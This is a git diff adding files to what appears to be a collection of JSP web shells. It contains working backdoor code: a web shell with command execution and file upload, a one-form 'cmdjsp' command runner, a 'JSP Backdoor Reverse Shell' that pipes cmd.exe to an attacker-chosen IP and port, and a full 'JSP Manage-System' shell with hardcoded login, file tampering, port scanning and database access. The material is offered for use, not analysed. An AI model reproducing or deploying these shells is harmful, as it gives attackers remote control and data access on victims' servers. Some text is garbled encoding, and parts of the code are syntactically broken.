+else{%>
+
+<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#ffffff" align="center" cellspacing="0">
+  <tr bgcolor="#333333"> 
+    <td colspan="4" align="center"><FONT face="Verdana, Arial, Helvetica, sans-serif" color="#ffffff">JspWebShell 
+      version 1.0</font><font color="#FFFFFF">(ÍøվĿ¼:<%=config.getServletContext().getRealPath("/")%>)</font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td colspan="4"> <font color="#000000"> 
+      <%
+	  File[] fs = File.listRoots();
+	  for (int i = 0; i < fs.length; i++){
+	  %>
+      <a href="<%=selfName %>?path=<%=fs[i].getPath()%>\">±¾µØ´ÅÅÌ(<%=fs[i].getPath()%>) 
+      </a> 
+      <%}%>
+      </font></td>
+  </tr>
+  <tr bgcolor="#999999"> 
+    <td height="10" colspan="4"> <font color="#000000"> 
+      <form name="form1" method="post" action="">
+        <input type="text" name="command" class="button">
+        <input type="submit" name="Submit" value="CMDÃüÁîÖ´ÐÐ" class="button">
+      </form>
+      </font> <p> 
+        <%
+		String cmd = "";
+		InputStream ins = null;
+		String result = "";		
+		if (request.getParameter("command") != null) {		
+			cmd = (String)request.getParameter("command");result = exeCmd(cmd);%>
+        <%=result == "" ? "&nbsp;" : result%> 
+        <%}%>
+       </td>
+  </tr>
+  <FORM METHOD="POST" ACTION="?up=true&path=<%String path1=config.getServletContext().getRealPath("/"); String tempfilepath=request.getParameter("path"); if(tempfilepath!=null) path1=tempfilepath;path1=path1.replaceAll("\\\\", "\\\\\\\\"); %><%=path1%>" ENCTYPE="multipart/form-data">
+    <tr bgcolor="#999999"> 
+      <td colspan="2"> <INPUT TYPE="FILE" NAME="FILE1" style="width:150"  SIZE="50" class="button"> 
+        <INPUT TYPE="SUBMIT" VALUE="ÉÏ´«" class="button"> </td>
+      <td colspan="2"><a href="?jsptz=true" target="_blank">JSP̽Õë</a> </td>
+    </tr>
+  </FORM>
+  <%     String fileexe="";
+             String dir="";
+             String deldir=""; 
+			 String scrfile="";
+			 String dstfile="";
+			  fileexe=request.getParameter("fileexe");
+		     dir=request.getParameter("dir");
+			 deldir=request.getParameter("deldir");
+		     scrfile=request.getParameter("scrfile");
+			 dstfile=request.getParameter("dstfile");
+		  if (fileexe!=null)
+			{
+			//out.print(path+fileexe);
+			createFile(path+fileexe); 
+			}
+		  if (dir!=null)
+			{
+			//out.print(path+dir);
+			createFolder(path+dir); 
+			}
+		  if (deldir!=null)
+			{
+			//out.print(deldir);
+		    DeleteFolder(deldir); 
+			}
+			if (scrfile!=null&dstfile!=null)
+			{
+			//out.print(scrfile);
+			//out.print(dstfile);
+			copyfinish=fileCopy(scrfile, dstfile) ;
+			}
+			%>
+  <tr bgcolor="#CCCCCC"> 
+    <td height="10" colspan="2" bgcolor="#999999"> <form name="form3" method="post" action="">
+        Îļþ¼ÐÃû£º 
+        <input name="dir" type="text" size="10" class="button">
+        <input type="submit" name="Submit3" value="н¨Ä¿Â¼" class="button">
+      </form></td>
+    <td width="188" height="10" bgcolor="#999999"> <form name="form4" method="post" action="">
+        ÎļþÃû£º 
+        <input name="fileexe" type="text" size="8" class="button">
+        <input type="submit" name="Submit4" value="н¨Îļþ" class="button">
+      </form></td>
+    <td width="327" height="10" bgcolor="#999999"><form name="form5" method="post" action="">
+        Îļþ<input name="scrfile" type="text" size="15"class="button">
+        ¸´ÖƵ½
+        <input name="dstfile" type="text" size="15" class="button">
+        <input type="submit" name="Submit5" value="¸´ÖÆ" class="button">
+      </form><font color="#FF0000"><%if(copyfinish==true) out.print("¸´ÖƳɹ¦");%></font></td>
+  </tr>
+  <%//ÉÏ´«
+             String tempfilename="";
+             String up=request.getParameter("up");
+			// String tempfilepath=request.getParameter("filepath");
+			// out.print(tempfilepath);
+			  if(up!=null)
+		  {
+	       tempfilename=(String)session.getId();
+          //String tempfilename=request.getParameter("file");
+          File f1=new File(tempfilepath,tempfilename);
+          int n;
+          try
+          {
+              InputStream in=request.getInputStream();
+              BufferedInputStream my_in=new BufferedInputStream(in);
+              FileOutputStream fout=new FileOutputStream(f1);
+              BufferedOutputStream my_out=new BufferedOutputStream(fout);
+              byte[] b=new byte[10000];
+              while((n=my_in.read(b))!=-1)
+              {
+                   my_out.write(b,0,n);
+              }
+              my_out.flush();
+              my_out.close();
+              fout.close();
+              my_in.close();
+              in.close();
+             // out.print("Îļþ´´½¨³É¹¦!<br>");
+          }
+          catch(IOException e)
+          {
+              out.print("Îļþ´´½¨Ê§°Ü!");
+          }
+          
+          try
+          {   
+              RandomAccessFile random1=new RandomAccessFile(f1,"r");
+              random1.readLine();
+              String filename=random1.readLine();
+              byte[] b=filename.getBytes("ISO-8859-1");
+              filename=new String(b);
+              int pointer=filename.lastIndexOf('\\');
+              filename=filename.substring(pointer+1,filename.length()-1);
+              File f2=new File(tempfilepath,filename);
+              RandomAccessFile random2=new RandomAccessFile(f2,"rw");
+              random1.seek(0);
+              for(int i=1; i<=4; i++)
+              {
+                   String tempstr=random1.readLine();
+              }
+              long startPoint=random1.getFilePointer();
+              random1.seek(random1.length());
+              long mark=random1.getFilePointer();
+              int j=0;
+              long endPoint=0;
+              while((mark>=0)&&(j<=5))
+              {
+                   mark--;
+                   random1.seek(mark);
+                   n=random1.readByte();
+                   if(n=='\n')
+
+                   {
+                         j++;
+                         endPoint=random1.getFilePointer();
+                   }
+              }
+              long length=endPoint-startPoint+1;
+              int order=(int)(length/10000);
+              int left=(int)(length%10000);
+              byte[] c=new byte[10000];
+              random1.seek(startPoint);
+              for(int i=0; i<order; i++)
+              {
+                    random1.read(c);
+                    random2.write(c);
+              }
+              random1.read(c,0,left);
+              random2.write(c,0,left);
+              random1.close();
+              random2.close();
+              f1.delete();
+              out.print("ÎļþÉÏ´«³É¹¦!");
+          }
+          catch(Exception e)
+          {
+              out.print("ÎļþÉÏ´«Ê§°Ü!");
+          }
+
+		  }
+	
+  %>
+  <tr> 
+    <td width="196" height="48" valign="top" bgcolor="#999999"> 
+      <%  try {
+	//path=request.getParameter("path");
+		//if(path==null)
+		//path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isDirectory())
+		    {%>
+      <a href="<%=selfName %>?path=<%=path%><%=fList[j].getName()%>\"> <%=fList[j].getName()%></a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="?path=<%=path%>&deldir=<%=path%><%=fList[j].getName()%>">ɾ³ý</a><br> 
+      <% }
+		
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("²»´æÔÚ»òûÓÐȨÏÞ");
+		}
+	%>
+      &nbsp; </td>
+    <td colspan="3" valign="top" bgcolor="#999999"> 
+      <%  try {
+	path=request.getParameter("path");
+		if(path==null)
+		path=config.getServletContext().getRealPath("/");
+		File f=new File(path);
+	    File[] fList= f.listFiles() ;
+	    for (int j=0;j<fList.length;j++)
+	    {
+		if (fList[j].isFile())
+		    {//request.getContextPath()µÃµ½ÐéÄâ·¾¶%>
+     <%=fList[j].getName()%> 
+       <a href="?path=<%String tempfilepath1=request.getParameter("path"); if(tempfilepath!=null) path=tempfilepath;%><%=path%>&editfile=<%=path%><%=fList[j].getName()%>" target="_blank">±à¼­</a> 
+      &nbsp; <a href="?action=del&path=<%=path%>&delfile=<%=path%><%=fList[j].getName()%>">ɾ³ý</a><br> 
+      <% }
+	     }//for
+		 } catch (Exception e) {
+			System.out.println("²»´æÔÚ»òûÓÐȨÏÞ");
+		}
+	%>
+    </td>
+  </tr>
+</table>
+<p align="center">Power By ¾ø¶ÔÁã¶È[B.C.T] QQ:48124012</p>
+<p align="center">&nbsp;</p>
+<%}//if edit
+}
+}
+%>
+</body>
+</html>
\ No newline at end of file
diff --git a/xakep-shells/JSP/cmdjsp.jsp.txt b/xakep-shells/JSP/cmdjsp.jsp.txt
new file mode 100644
index 0000000..63625af
--- /dev/null
+++ b/xakep-shells/JSP/cmdjsp.jsp.txt
@@ -0,0 +1,32 @@
+// note that linux = cmd and windows = "cmd.exe /c + cmd" 
+
+<FORM METHOD=GET ACTION='cmdjsp.jsp'>
+<INPUT name='cmd' type=text>
+<INPUT type=submit value='Run'>
+</FORM>
+
+<%@ page import="java.io.*" %>
+<%
+   String cmd = request.getParameter("cmd");
+   String output = "";
+
+   if(cmd != null) {
+      String s = null;
+      try {
+         Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
+         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
+         while((s = sI.readLine()) != null) {
+            output += s;
+         }
+      }
+      catch(IOException e) {
+         e.printStackTrace();
+      }
+   }
+%>
+
+<pre>
+<%=output %>
+</pre>
+
+<!--    http://michaeldaw.org   2006    -->
diff --git a/xakep-shells/JSP/jsp-reverse.jsp.txt b/xakep-shells/JSP/jsp-reverse.jsp.txt
new file mode 100644
index 0000000..ae9a781
--- /dev/null
+++ b/xakep-shells/JSP/jsp-reverse.jsp.txt
@@ -0,0 +1,91 @@
+// backdoor.jsp
+// http://www.security.org.sg/code/jspreverse.html
+
+<%@
+page import="java.lang.*, java.util.*, java.io.*, java.net.*"
+% >
+<%!
+static class StreamConnector extends Thread
+{
+        InputStream is;
+        OutputStream os;
+
+        StreamConnector(InputStream is, OutputStream os)
+        {
+                this.is = is;
+                this.os = os;
+        }
+
+        public void run()
+        {
+                BufferedReader isr = null;
+                BufferedWriter osw = null;
+
+                try
+                {
+                        isr = new BufferedReader(new InputStreamReader(is));
+                        osw = new BufferedWriter(new OutputStreamWriter(os));
+
+                        char buffer[] = new char[8192];
+                        int lenRead;
+
+                        while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0)
+                        {
+                                osw.write(buffer, 0, lenRead);
+                                osw.flush();
+                        }
+                }
+                catch (Exception ioe)
+
+                try
+                {
+                        if(isr != null) isr.close();
+                        if(osw != null) osw.close();
+                }
+                catch (Exception ioe)
+        }
+}
+%>
+
+<h1>JSP Backdoor Reverse Shell</h1>
+
+<form method="post">
+IP Address
+<input type="text" name="ipaddress" size=30>
+Port
+<input type="text" name="port" size=10>
+<input type="submit" name="Connect" value="Connect">
+</form>
+<p>
+<hr>
+
+<%
+String ipAddress = request.getParameter("ipaddress");
+String ipPort = request.getParameter("port");
+
+if(ipAddress != null && ipPort != null)
+{
+        Socket sock = null;
+        try
+        {
+                sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());
+
+                Runtime rt = Runtime.getRuntime();
+                Process proc = rt.exec("cmd.exe");
+
+                StreamConnector outputConnector =
+                        new StreamConnector(proc.getInputStream(),
+                                          sock.getOutputStream());
+
+                StreamConnector inputConnector =
+                        new StreamConnector(sock.getInputStream(),
+                                          proc.getOutputStream());
+
+                outputConnector.start();
+                inputConnector.start();
+        }
+        catch(Exception e) 
+}
+%>
+
+<!--    http://michaeldaw.org   2006    -->
diff --git a/xakep-shells/JSP/jspshall.jsp.txt b/xakep-shells/JSP/jspshall.jsp.txt
new file mode 100644
index 0000000..41c608e
--- /dev/null
+++ b/xakep-shells/JSP/jspshall.jsp.txt
@@ -0,0 +1,862 @@
+<%@page import="java.util.*,java.io.*,java.sql.*,java.util.zip.*,java.lang.reflect.*,java.net.*,javax.servlet.jsp.*"%>
+<%@page contentType="text/html;charset=GBK"%>
+<%@page pageEncoding="gb2312"%>
+<%!
+final String APP_NAME="KJ021320 JSP Manage-System 1.0";
+int portListen=5000;//set the httpproxy port
+boolean openHttpProxy=false;//set the httpproxy load-on-start-up
+%>
+<%
+    session.setMaxInactiveInterval(6000);
+    final String WEB_SITE=folderReplace(application.getRealPath("/"));
+    final String URL=request.getRequestURI();
+    if(session.getAttribute("ID")==null){
+        // the user and pass  field  
+        String username="kj021320";
+        String password="kj021320";
+        // the user and pass  field  
+        if(request.getParameter("LName")!=null&&request.getParameter("LPass")!=null&&request.getParameter("LName").equals(username)&&request.getParameter("LPass").equals(password)){
+            session.setAttribute("ID","1");
+            response.sendRedirect(URL);
+        }else{
+            out.println("<center style=font-size:12px><br><br>"+APP_NAME+"<br><br>" +
+                       "<form name=login method=post>username:<input name=LName type=text size=15><br>" +
+                    "password:<input name=LPass type=password size=15><br><input type=submit value=Login></form></center>");
+        }
+        return;
+    }
+%>
+<html>
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=gb2312">
+<title><%=APP_NAME%></title>
+<style type="text/css">
+ body,td{font-size: 12px;}
+table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');}
+ input,select{font-size:12px;}
+ body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;}
+ td{white-space:nowrap;}
+ a{color:black;text-decoration:none;}
+</style>
+<script>
+    Top=top.address;
+    function downFile(file){
+        Top.Filename.value=file;
+        Top.Action.value="D";
+        Top.submit();
+    }
+    function checkUrl(){
+        top.address.Action.value="F";
+        top.address.submit();
+    }
+    function editFile(file){
+        top.address.Action.value="E";
+        top.address.Filename.value=file;
+        top.address.submit();
+    }
+    function delFile(file){
+        top.address.Action.value="R";
+        top.address.Filename.value=file;
+        top.address.submit();
+    }
+    function reName(file){
+        if((Rname=prompt("rename to?",file))!=""&&Rname!=null){
+            Top.Action.value="N";
+            top.address.Filename.value=file+"|"+Rname;
+            Top.submit();
+        }
+    }
+    function copyFile(file){
+        if((Rname=prompt("copy to?",file))!=""&&Rname!=null){
+            Top.Action.value="P";
+            top.address.Filename.value=file+"|"+Rname;
+            Top.submit();
+        }
+    }
+    function setDate(file){
+        document.write("Change date:<br><form method='post' action='?Action=dateChange'>");
+        document.write("filename:<input name='Filename' type='text' size=60 readonly value='"+file+"'><br>");
+        document.write("Year:<select name='year'>");
+        for(i=1970;i<=2050;i++){
+            document.write("<option value="+i+">"+i+"</option>");
+        }
+        document.write("</select>");
+        document.write("Month:<select name='month'>");
+        for(i=1;i<=12;i++){
+            document.write("<option value="+i+">"+i+"</option>");
+        }
+        document.write("</select>");
+        document.write("Day:<select name='day'>");
+        for(i=1;i<=31;i++){
+            document.write("<option value="+i+">"+i+"</option>");
+        }
+        document.write("</select>");
+        document.write("<input name='Action' type='button' onclick='top.address.Action.value=\"d\";this.form.submit();' value='dateChange'>");
+        document.write("<input name='cancel' onclick='history.back();' type='button' value='Cancel'>");
+    }
+    function zipFile(file){
+        if((zipF=prompt("save to ?",file+"/down.zip"))!=""&&zipF!=null){
+            top.address.Action.value="Z";
+            top.address.FolderPath.value=file;
+            top.address.Filename.value=zipF;
+            top.address.submit();
+        }
+    }
+    function setDataBase(f){
+        driverName=new Array();
+        driverName[0]="com.sybase.jdbc2.jdbc.SybDriver";
+        driverName[1]="com.microsoft.jdbc.sqlserver.SQLServerDriver";
+        driverName[2]="com.mysql.jdbc.Driver";
+        driverName[3]="oracle.jdbc.driver.OracleDriver";
+        driverName[4]="com.ibm.db2.jdbc.app.DB2Driver";
+        driverName[5]="org.postgresql.Driver";
+        conUrl=new Array();
+        conUrl[0]="jdbc:jtds:sybase://host:port/database";
+        conUrl[1]="jdbc:microsoft:sqlserver://host:port;DatabaseName=";
+        conUrl[2]="jdbc:mysql://host:port/database";
+        conUrl[3]="jdbc:oracle:thin:@host:port:database";
+        conUrl[4]="jdbc:db2://host:port/database";
+        conUrl[5]="jdbc:postgresql://host:port/database";
+        
+        f.driver.value=driverName[f.DB.selectedIndex];
+        f.conUrl.value=conUrl[f.DB.selectedIndex];
+    }
+</script>
+</head>
+<body>
+<%
+    String Action=request.getParameter("Action");
+    char action=(Action==null?"0":Action).charAt(0);
+    try{
+        switch(action){
+        //each skill
+            case 'M':mainMenu(out,WEB_SITE);break;
+            case 'F':showFiles(out,encodeChange(request.getParameter("FolderPath")));break;
+            case 'S':showSystemInfo(out);break;
+            case 'L':servletInfo(config,out);break;
+            case 'D':downFile(encodeChange(request.getParameter("Filename")),response);return;
+            case 'E':editFile(encodeChange(request.getParameter("Filename")),out);break;
+            case 'R':deleteFile(encodeChange(request.getParameter("Filename")),out);break;
+            case 'K':saveFile(encodeChange(request.getParameter("filename")),request.getParameter("FileContent").getBytes("ISO-8859-1"),out);break;
+            case 'N':renameFile(encodeChange(request.getParameter("Filename")),out);break;
+            case 'P':copyFile(encodeChange(request.getParameter("Filename")),out);break;
+            case 'd':dateChange(encodeChange(request.getParameter("Filename")),request.getParameter("year"),request.getParameter("month"),request.getParameter("day"),out);break;
+            case 'r':execFile(encodeChange(request.getParameter("execFile")),out);break;
+            case 'Z':zip(encodeChange(request.getParameter("Filename")),encodeChange(request.getParameter("FolderPath")),out);break;
+            case 'U':upfile(request,out,encodeChange(request.getParameter("UPaddress")));break;
+            case 'n':newFolder(out,encodeChange(request.getParameter("Filename")));break;
+            case 'A':reflectAPI(out,encodeChange(request.getParameter("Filename")));break;
+            case 'I':scanPort(out,encodeChange(request.getParameter("IPaddress")),Integer.parseInt(request.getParameter("startPort")),Integer.parseInt(request.getParameter("endPort")));break;
+            case 's':ConnectionDBM(out,encodeChange(request.getParameter("driver")),encodeChange(request.getParameter("conUrl")),encodeChange(request.getParameter("user")),encodeChange(request.getParameter("password")),encodeChange(request.getParameter("run")),encodeChange(request.getParameter("sqlcmd")));break;
+            case 'H':switchProxyService(out);break;
+            case 'i':userInterFaces(out);break;
+            case 'T':systemTools(out);break;
+            default:
+                mainForm(WEB_SITE,out);break;
+        }
+    }catch(Exception e){
+    }
+    out.print("</body></html>");
+    out.close();
+
+%>
+<%!
+//the main framwork
+void mainForm(String web_Site,JspWriter out)throws Exception{
+    out.print("<table width=100% height=100% border=0 bgcolor=menu>");
+    out.print("<tr><td height=30 colspan=2>");
+    out.print("<table width=100% height=25 border=0>");
+    out.print("<form name=address method=post target=FileFrame onSubmit='checkUrl();'>");
+    out.print("<tr><td width=60 align=center>FilePath:</td><td>");
+    out.print("<input name=FolderPath style=width:100% value='"+web_Site+"' onchange='checkUrl();'>");
+    out.print("<input type=hidden name=Action value=F>");
+    out.print("<input type=hidden name=Filename>");
+    out.print("</td><td width=60 align=center><a href='javascript:checkUrl();'>GOtoLink</a>"); 
+    out.print("</td></tr></form></table></td></tr><tr><td width=148>");
+    out.print("<iframe name=Menu src=?Action=M width=100% height=100% frameborder=2 scrolling=yes></iframe></td>");
+    out.print("<td width=600>");
+    out.print("<iframe name=FileFrame src='?Action=F&FolderPath="+web_Site+"' width=100% height=100% frameborder=1 scrolling=yes></iframe>");
+    out.print("</td></tr></table>");
+}
+//menu form to choose
+void mainMenu(JspWriter out,String web_Site)throws Exception{
+    out.println("<table>");
+    out.println("<tr><td bgcolor=Gray><a href=?Action=M>"+ico(58)+"FileOperation(File.class)</a></td></tr>");
+    out.println("<tr><td bgcolor=menu onclick=top.address.FolderPath.value='"+folderReplace(web_Site)+"'><a href='?Action=F&FolderPath="+web_Site+"' target=FileFrame>"+ico(48)+"WEB Folder</a></td></tr>");
+    out.println("<tr><td bgcolor=menu><a href=?Action=S target=FileFrame>"+ico(53)+"SystemInfo(System.class)</a></td></tr>");
+    out.println("<tr><td bgcolor=menu><a href=?Action=L target=FileFrame>"+ico(53)+"ServletInfo</a></td></tr>");
+    out.println("<tr><td bgcolor=menu><a href=?Action=T target=FileFrame>"+ico(53)+"SystemTools</a></td></tr>");
+    out.println("<tr><td bgcolor=menu><a href=?Action=i target=FileFrame>"+ico(57)+"Interfaces</a></td></tr>");
+    out.println("<tr><td bgcolor=menu><a href='http://blog.csdn.net/kj021320' target=FileFrame>About nonamed(kj021320)</a></td></tr>");
+    out.println("</table>");
+}
+//show all files and folders
+void showFiles(JspWriter out,String path)throws Exception{
+    File file=new File(path);
+    long maxSize=0;
+    if(file.isDirectory()&&file.exists()){
+        File[] f=file.listFiles();
+        out.println("<table><tr bgcolor=menu><td>name</td><td>type</td><td>size</td><td>modify date</td><td>readonly</td><td>can write</td><td>hidden</td><td>Action</td></tr>");
+        for(int i=0;i<f.length;i++){
+            maxSize=maxSize+f[i].length();
+            if(f[i].isDirectory())
+                out.println("<tr bgcolor=menu><td><a href=\"javascript:top.address.FolderPath.value='"+folderReplace(f[i].getAbsolutePath())+"/';checkUrl();\">"+ico(48)+f[i].getName()+"</a></td><td> DIR </td><td>"+getSize(f[i].length())+"</td><td>"+new java.util.Date(f[i].lastModified())+"</td><td>"+f[i].canRead()+"</td><td>"+f[i].canWrite()+"</td><td>"+f[i].isHidden()+"</td><td>"+fOperation(true,f[i].getAbsolutePath())+"</td></tr>");
+            else
+                out.println("<tr><td>"+ico(50)+f[i].getName()+"</td><td> file </td><td>"+getSize(f[i].length())+"</td><td>"+new java.util.Date(f[i].lastModified())+"</td><td>"+f[i].canRead()+"</td><td>"+f[i].canWrite()+"</td><td>"+f[i].isHidden()+"</td><td>"+fOperation(false,f[i].getAbsolutePath())+"</td></tr>");
+        }
+        out.println("</table>");
+        out.print("this folder size:"+getSize(maxSize));
+    }
+}
+//show the system information
+void showSystemInfo(JspWriter out)throws Exception{
+    Map map=null;
+    Set set=null;
+    Iterator it=null;
+    
+    /*use for jdk1.5
+    map=System.getenv();
+    set=map.keySet();
+    it=set.iterator();
+    out.print("<hr>System Env info:<ul>");
+    while(it.hasNext()){
+        Object oName=it.next();
+        out.println("<li>"+oName+" [ "+map.get(oName)+" ]");
+    }
+    out.print("</ul>");
+    */
+    
+    map=System.getProperties();
+    set=map.keySet();
+    it=set.iterator();
+    out.println("<hr>System Property info:<ul>");
+        while(it.hasNext()){
+        Object oName=it.next();
+        out.println("<li>"+oName+" [ "+map.get(oName)+" ]");
+    }
+    out.print("</ul><hr>System CPU :");
+    out.print(Runtime.getRuntime().availableProcessors()+" <br>");
+    out.print("the JVM Free Memory :"+getSize(Runtime.getRuntime().freeMemory()));
+    out.print("<br>the JVM Max Memory :"+getSize(Runtime.getRuntime().maxMemory()));
+}
+//show servlet information
+void servletInfo(ServletConfig config,JspWriter out)throws Exception{
+    ServletContext sc=config.getServletContext();
+    out.println("Server info: "+sc.getServerInfo()+"<br>");
+    out.println("ServletContext name: "+sc.getServletContextName()+"<br>");
+    out.println("Major version :"+sc.getMajorVersion()+"<br>");
+    out.println("Minor version :"+sc.getMinorVersion()+"<br>");
+    Enumeration en=sc.getInitParameterNames();
+    String initInfo="init parameter: <br>";
+    out.print(initInfo);
+    while(en.hasMoreElements()){
+        String name=(String)en.nextElement();
+        initInfo="key:"+name+" value:"+sc.getInitParameter(name) +"<br>";
+        out.print(initInfo);
+    }
+   
+}
+//down the server file
+void downFile(String filename,HttpServletResponse res)throws Exception{
+    int w=0;
+    byte[] buffer=new byte[256];
+    byte[] b=(new File(filename)).getName().getBytes("gb2312");
+    String outFile=new String(b,"ISO-8859-1");
+    res.reset();
+    res.setHeader("Content-disposition","attachment;filename=\""+outFile+"\"");
+    ServletOutputStream sos=res.getOutputStream();
+    BufferedInputStream bis=null;
+    try{
+        bis=new BufferedInputStream(new FileInputStream(filename));
+        while((w=bis.read(buffer,0,buffer.length))!=-1){
+            sos.write(buffer,0,w);
+        }
+    }catch(Exception e){
+    }finally{
+        if(bis!=null)bis.close();
+    }
+    sos.flush();
+    res.flushBuffer();
+}
+//delect file
+void deleteFile(String filename,JspWriter out)throws Exception{
+    File f=new File(filename);
+    if(f.exists()){
+        if(f.delete())out.print(filename+"delete success...");
+    }else{
+        out.print("file not find!!");
+    }
+}
+//rename the file
+void renameFile(String filename,JspWriter out)throws Exception{
+    int split=filename.indexOf("|");
+    String newFilename=filename.substring(split+1);
+    filename=filename.substring(0,split);
+    File f=new File(filename);
+    if(f.exists()){
+        if(f.renameTo(new File(newFilename)))out.print(newFilename+" file move success");
+    }else{
+        out.print("file not find!!");
+    }
+}
+//file copy
+void copyFile(String filename,JspWriter out)throws Exception{
+    int split=filename.indexOf("|");
+    String newFilename=filename.substring(split+1);
+    filename=filename.substring(0,split);
+    File f=new File(filename);
+    BufferedInputStream bis=null;
+    BufferedOutputStream bos=null;
+    if(f.exists()){
+        try{
+            bis=new BufferedInputStream(new FileInputStream(filename));
+            bos=new BufferedOutputStream(new FileOutputStream(newFilename));
+            int s=0;
+            while((s=bis.read())!=-1){
+                bos.write(s);
+            }
+        }catch(Exception e){
+            out.print("file copy error");
+        }finally{
+            if(bis!=null)bis.close();
+            if(bos!=null)bos.close();
+        }
+        out.print(newFilename+"file copy success");
+    }else{
+        out.print("file not find!!");
+    }
+}
+//file editor
+void editFile(String filename,JspWriter out)throws IOException{
+    File f=new File(filename);
+    out.print("<form method=post>File Path:");
+    out.print("<input type=text size=80 name=filename value='"+filename+"'>");
+    out.print("<input type=button name=kFile onClick='this.form.action=\"?Action=K\";this.form.submit();' value=KeepFile >");
+    out.print("<input type=button onClick=editFile(this.form.filename.value); value=ReadFile>");
+    out.print("<textarea name=FileContent rows=35 style=width:100%;>");
+    if(f.exists()){
+        try{
+            BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(filename),"Gb2312"));
+            String s="";
+            while((s=br.readLine())!=null){ 
+                out.println(htmlEntity(s)); 
+            }
+        }catch(Exception e){
+            out.print("file edit error");
+        }finally{
+        }
+    }
+    out.print("</textarea></form>");
+}
+//file save
+void saveFile(String filename,byte[] fileContent,JspWriter out)throws IOException{
+    if(filename!=null||fileContent!=null){
+        BufferedOutputStream bos=null;
+        try{
+            bos=new BufferedOutputStream(new FileOutputStream(filename));
+            bos.write(fileContent,0,fileContent.length);
+        }finally{
+            if(bos!=null)bos.close();
+        }
+        out.print(filename+"file save success");
+    }else{
+        out.print("Error");
+    }
+}
+//chang the file modify date
+void dateChange(String filename,String year,String month,String day,JspWriter out)throws IOException{
+    File f=new File(filename);
+    if(f.exists()){
+        Calendar calendar=Calendar.getInstance();
+        calendar.set(Integer.parseInt(year),Integer.parseInt(month),Integer.parseInt(day));
+        if(f.setLastModified(calendar.getTimeInMillis()))
+            out.print(filename+"file date change success");
+        else
+            out.print(filename+"file date change error");
+    }else{
+        out.println("file not find!!!");
+    }
+}
+//run file
+void execFile(String file,JspWriter out)throws Exception{
+    int i=0;
+    Runtime rt=Runtime.getRuntime();
+    Process ps=rt.exec(file);
+    InputStreamReader isr = null;
+    char[] bufferC=new char[1024];
+    try{
+        isr=new InputStreamReader(ps.getInputStream(),"GB2312");
+        out.print("<textarea rows=35 style=width:100%;>");
+        while((i=isr.read(bufferC,0,bufferC.length))!=-1){
+            out.print(htmlEntity(new String(bufferC,0,i)));
+        }
+    }catch(Exception e){
+        out.print("run file error");
+    }finally{
+        if(isr!=null)isr.close();
+    }
+    out.print("</textarea>");
+    systemTools(out);
+}
+//zip zhe folder
+void zip(String zipPath, String srcPath,JspWriter out) throws Exception {
+    FileOutputStream output = null;
+    ZipOutputStream zipOutput = null;
+    try{
+        output = new FileOutputStream(zipPath);
+        zipOutput = new ZipOutputStream(output);
+        zipEntry(zipOutput,srcPath,srcPath,zipPath);
+    }catch(Exception e){
+        out.print("file zip error");
+    }finally{
+        if(zipOutput!=null)zipOutput.close();
+    }
+    out.print("zip ok"+zipPath);
+}
+//add the zip entry
+void zipEntry(ZipOutputStream zipOs, String initPath,String filePath,String zipPath) throws Exception {
+    String entryName = filePath;
+    File f = new File(filePath);
+    if (f.isDirectory()){// check is folder
+        String[] files = f.list();
+        for(int i = 0; i < files.length; i++)
+            zipEntry(zipOs, initPath, filePath + File.separator + files[i],zipPath);
+        return;
+    }
+    String chPh = initPath.substring(initPath.lastIndexOf("/") + 1);// ?????
+    int idx=initPath.lastIndexOf(chPh);
+    if (idx != -1) {
+        entryName = filePath.substring(idx);
+    }
+    ZipEntry entry;
+    entry = new ZipEntry(entryName);
+    File ff = new File(filePath);
+    if(ff.getAbsolutePath().equals(zipPath))return;
+    entry.setSize(ff.length());
+    entry.setTime(ff.lastModified());
+    //the CRC efficacy  
+    entry.setCrc(0);
+    CRC32 crc = new CRC32();
+    crc.reset();
+    zipOs.putNextEntry(entry);
+    int len = 0;
+    byte[] buffer = new byte[2048];
+    int bufferLen = 2048;
+    FileInputStream input =null;
+    try{
+        input = new FileInputStream(filePath);
+        while ((len = input.read(buffer, 0, bufferLen)) != -1) {
+                zipOs.write(buffer, 0, len);
+                crc.update(buffer, 0, len);
+        }
+    }catch(Exception e){
+    }finally{
+        if(input!=null)input.close();
+    }
+    entry.setCrc(crc.getValue());
+}
+//file upload to server
+void upfile(HttpServletRequest request,JspWriter out,String filename)throws Exception{
+        String boundary = request.getContentType().substring(30);//?????
+        ServletInputStream sis=request.getInputStream();
+        BufferedOutputStream bos=null;
+        byte[] buffer = new byte[256];
+        String line=null;
+        for(int i=0;i<5;i++){
+            line=readLine(buffer,sis);
+        }
+        try{
+            bos=new BufferedOutputStream(new FileOutputStream(filename));
+            //read the filedata
+            while(line!=null&&line.indexOf(boundary)==-1){
+                bos.write(buffer,0,line.getBytes().length);
+                line=readLine(buffer,sis);
+            }
+            out.print("upload success!");
+        }catch(Exception e){
+            out.print("upload error");
+        }finally{
+            if(bos!=null)bos.close();
+        }
+}
+String readLine(byte[] lineByte,ServletInputStream servletInputstream){
+    try{
+        int len=0;
+        len=servletInputstream.readLine(lineByte,0,lineByte.length);
+        if(len == -1){
+                return null;
+        }else{
+        return new String(lineByte,0,len);
+        }
+    }catch(Exception _ex){
+        return null;
+    }
+}
+//create folder
+void newFolder(JspWriter out,String foldername)throws Exception{
+    File f=new File(foldername);
+    if(f.mkdirs()){
+        out.print("the folder create success!");
+    }else{
+        out.print("the folder create error");
+    }
+}
+//reflect java API classes
+void reflectAPI(JspWriter out,String className)throws Exception{
+    Class cls=Class.forName(className);
+    String constructor="";
+    String ifString="";
+    Class[] interfaces=cls.getInterfaces();
+    String supperClass=cls.getSuperclass().toString();
+    Constructor[] c=cls.getDeclaredConstructors();
+    Field[] f=cls.getDeclaredFields();
+    Method[] m=cls.getDeclaredMethods();
+    
